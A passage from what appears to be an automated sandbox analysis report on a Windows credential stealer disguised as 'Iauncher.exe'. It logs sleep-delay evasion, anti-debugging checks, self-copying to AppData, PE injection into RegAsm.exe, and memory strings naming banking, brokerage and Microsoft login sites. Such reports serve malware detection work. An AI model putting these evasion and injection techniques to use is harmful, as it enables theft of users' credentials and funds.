                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598888s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -598094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597984s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -597094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596984s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -596109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595999s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595647s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595312s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595203s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -595093s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -594969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -594859s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -594750s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -594640s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -594531s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7652Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057960E FindFirstFileExW,11_2_0057960E
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598888Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598766Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598094Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597984Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597094Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596984Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596109Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595999Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595647Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595531Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595422Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595312Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595203Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595093Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594969Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594859Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594640Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594531Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                          Source: RegAsm.exe, 0000000D.00000002.1432276704.0000000000786000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: Iauncher.exe, 00000000.00000002.3682596392.0000000005619000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1432276704.0000000000786000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.0000000002A1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: RegAsm.exe, 0000000D.00000002.1439916693.000000000367A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0056AAD3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00570E87 mov ecx, dword ptr fs:[00000030h]11_2_00570E87
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057A789 mov eax, dword ptr fs:[00000030h]11_2_0057A789
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057CD88 GetProcessHeap,11_2_0057CD88
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0056AAD3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566A95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00566A95
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00566D9F
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00566EFB SetUnhandledExceptionFilter,11_2_00566EFB
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Allocates memory in foreign processes
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Writes to foreign memory regions
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 321008Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0056687C cpuid 11_2_0056687C
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,11_2_0057C828
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_0057C951
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,11_2_0057C1C2
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,11_2_0057CA57
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0057CB26
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,11_2_0057C464
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,11_2_0057C4AF
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,11_2_0057C54A
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,11_2_00575D19
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0057C5D5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,11_2_005757F3
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Users\user\Desktop\Iauncher.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
